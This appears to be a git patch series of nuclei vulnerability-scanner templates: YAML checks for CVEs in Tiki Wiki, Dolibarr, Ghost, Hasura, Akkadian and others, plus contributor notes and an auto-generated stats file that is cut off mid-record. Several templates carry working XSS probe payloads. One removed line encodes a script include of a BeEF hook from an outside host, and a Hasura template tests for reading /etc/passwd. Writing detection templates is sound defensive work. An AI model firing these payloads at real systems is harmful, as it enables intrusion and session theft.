XSS author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. @@ -9,18 +9,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 - tags: cve,cve2011,xss,tiki-wiki + tags: cve,cve2011,xss,tikiwiki requests: - method: GET path: - - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E" + - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status From 8627aadce0beb806c58f532528b39187e9e40aee Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 3 Aug 2021 01:17:48 +0900 Subject: [PATCH 1385/4083] Create CVE-2020-27361.yaml An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-27361.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-27361.yaml diff --git a/cves/2020/CVE-2020-27361.yaml b/cves/2020/CVE-2020-27361.yaml new file mode 100644 index 0000000000..cc00677a99 --- /dev/null +++ b/cves/2020/CVE-2020-27361.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-27361 + +info: + name: Akkadian Provisioning Manager - Files Listing + author: gy741 + severity: high + description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. + reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ + tags: cve,cve2020,akkadian,listing,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/pme/media/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of /pme/media" + - "Parent Directory" + condition: and + + - type: status + status: + - 200 From f93858622d3393a32002fe5158858b5d5d810017 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 21:59:27 +0530 Subject: [PATCH 1386/4083] Update CVE-2014-8799.yaml --- cves/2014/CVE-2014-8799.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml index 6898342c4e..2b9c04935c 100644 --- a/cves/2014/CVE-2014-8799.yaml +++ b/cves/2014/CVE-2014-8799.yaml @@ -21,6 +21,8 @@ requests: words: - "DB_NAME" - "DB_PASSWORD" + - "DB_USER" + - "DB_HOST" part: body condition: and From 6102421e22f06e3ae6ffdeb1b057bdb9e1266703 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 22:03:12 +0530 Subject: [PATCH 1387/4083] Update hasura-graphql-ssrf.yaml --- vulnerabilities/other/hasura-graphql-ssrf.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml index fc77816080..f54c005b18 100644 --- a/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: high reference: https://cxsecurity.com/issue/WLB-2021040115 - tags: hasura + tags: hasura,ssrf requests: - raw: From 204cf337c8e7f5c938db323c746007d151b6245a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 22:15:52 +0530 Subject: [PATCH 1388/4083] Update hasura-graphql-psql-exec.yaml --- vulnerabilities/other/hasura-graphql-psql-exec.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml index 3a6a332c7c..62ff6bc24d 100644 --- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml @@ -4,7 +4,7 @@ info: author: Udyz name: Hasura GraphQL Engine - postgresql query exec severity: critical - reference: https://github.com/projectdiscovery/nuclei-templates/blob/53bed168cce5619e18b991c56779d4ce31ce153f/vulnerabilities/other/hasura-graphql-ssrf.yaml + reference: https://www.exploit-db.com/exploits/49802 tags: hasura,rce requests: @@ -34,3 +34,4 @@ requests: - type: regex regex: - "root:.*:0:0:" + part: body From 4e976706b853a428fdae95d31d664a9139468e8e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 22:18:41 +0530 Subject: [PATCH 1389/4083] Update hasura-graphql-psql-exec.yaml --- vulnerabilities/other/hasura-graphql-psql-exec.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml index 62ff6bc24d..98bcfbc283 100644 --- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml @@ -29,7 +29,7 @@ requests: } ] } - + matchers: - type: regex regex: From e359b030f20727dbfe4ccacac9811f148d4d1e8a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 22:25:21 +0530 Subject: [PATCH 1390/4083] Update CVE-2018-5233.yaml --- cves/2018/CVE-2018-5233.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-5233.yaml b/cves/2018/CVE-2018-5233.yaml index ff121f82e0..6dd9374e44 100644 --- a/cves/2018/CVE-2018-5233.yaml +++ b/cves/2018/CVE-2018-5233.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/admin/tools/a--%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E" + - "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '>' + - '' part: body - type: status From f924e58b8ee4529e3bb507d08c689d6fc9d59962 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 22:31:01 +0530 Subject: [PATCH 1391/4083] Update CVE-2018-10095.yaml --- cves/2018/CVE-2018-10095.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-10095.yaml b/cves/2018/CVE-2018-10095.yaml index 3030d7fc62..99d22365ce 100644 --- a/cves/2018/CVE-2018-10095.yaml +++ b/cves/2018/CVE-2018-10095.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%22%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%2e%6c%61%62%2f%62%65%65%66%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e&model=5160&optioncss=print" + - "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print" matchers-condition: and matchers: - type: word words: - - '">' + - '' part: body - type: status From 61bb675add2ac8bd491ba02a05edd5f5a784d89c Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 2 Aug 2021 12:25:54 -0500 Subject: [PATCH 1392/4083] Update general-tokens.yaml squashing false positives --- exposures/tokens/generic/general-tokens.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 68ec941889..035c9e8cd9 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -28,6 +28,7 @@ requests: - '(?i)key(up|down|press|boardnavigation)' - '(?i)password(emailnotfoundmessage|label|errormessage|message)' - '(?i)keys_(close|previous|next|zoom|play_pause)' + - '(?i)password(lessauth|requirementsashtmllist)' condition: or negative: true From a02ae7bef77cc13dbeb8c1fcbd54683b2b5bd4b5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 2 Aug 2021 12:27:07 -0500 Subject: [PATCH 1393/4083] Update general-tokens.yaml --- exposures/tokens/generic/general-tokens.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 035c9e8cd9..142665eae3 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -26,9 +26,8 @@ requests: part: body regex: - '(?i)key(up|down|press|boardnavigation)' - - '(?i)password(emailnotfoundmessage|label|errormessage|message)' + - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message)' - '(?i)keys_(close|previous|next|zoom|play_pause)' - - '(?i)password(lessauth|requirementsashtmllist)' condition: or negative: true From 3f8e3ce2d0063613515400a2547feaa7c9b2b2cb Mon Sep 17 00:00:00 2001 From: Harsh Jaiswal Date: Mon, 2 Aug 2021 23:05:35 +0530 Subject: [PATCH 1394/4083] Update cves/2021/CVE-2021-29484.yaml Co-authored-by: Toufik Airane --- cves/2021/CVE-2021-29484.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index ecbb8b9ac4..87bc4f6b11 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -8,10 +8,9 @@ info: reference: https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg requests: - - raw: - - | - GET /ghost/preview HTTP/1.1 - {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/ghost/preview" matchers-condition: and matchers: From e2b20b8f0196ed6d7a9785e8a48dcca23f9a75c8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 23:16:05 +0530 Subject: [PATCH 1395/4083] Adding metadata --- cves/2021/CVE-2021-29484.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index 87bc4f6b11..1182c01f6c 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -2,10 +2,13 @@ id: CVE-2021-29484 info: name: DOM XSS in Ghost CMS - author: rootxharsh, iamnoooob + author: rootxharsh,iamnoooob + description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site. severity: medium - tags: ghost - reference: https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg + tags: cve,cve2021,xss,ghost + reference: | + - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg + - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 requests: - method: GET From b64e0323bf511c70e328446a8b1df68f62d5f9a3 Mon Sep 17 00:00:00 2001 From: Toufik Airane Date: Mon, 2 Aug 2021 20:44:27 +0200 Subject: [PATCH 1396/4083] Update CONTRIBUTING.md --- CONTRIBUTING.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 2a3e83abcb..61084b76db 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -97,3 +97,4 @@ You can refer to the following articles of Git and GitHub basics. In case you ar - **Nuclei** outcomes are only as excellent as **template matchers💡** - Declare at least two matchers to reduce false positive - Avoid matching words reflected in the URL to reduce false positive +- Avoid short word that could be encountered anywhere From ad7756317dafffc117849fcc3f599e454e32ac72 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 3 Aug 2021 00:14:33 +0530 Subject: [PATCH 1397/4083] Added missing condition --- technologies/openx-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/openx-detect.yaml b/technologies/openx-detect.yaml index 1f43024105..9d76d1fab6 100644 --- a/technologies/openx-detect.yaml +++ b/technologies/openx-detect.yaml @@ -11,6 +11,7 @@ requests: path: - "{{BaseURL}}/www/admin/" + matchers-condition: and matchers: - type: regex part: body From 4f123f0109aa97ac4a4f41faa4f737b99ed884d7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 2 Aug 2021 18:53:33 +0000 Subject: [PATCH 1398/4083] Auto Generated Templates Stats [Mon Aug 2 18:53:33 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1291 ++++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 677 insertions(+), 636 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 7f012a1194..eb7207b358 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"nam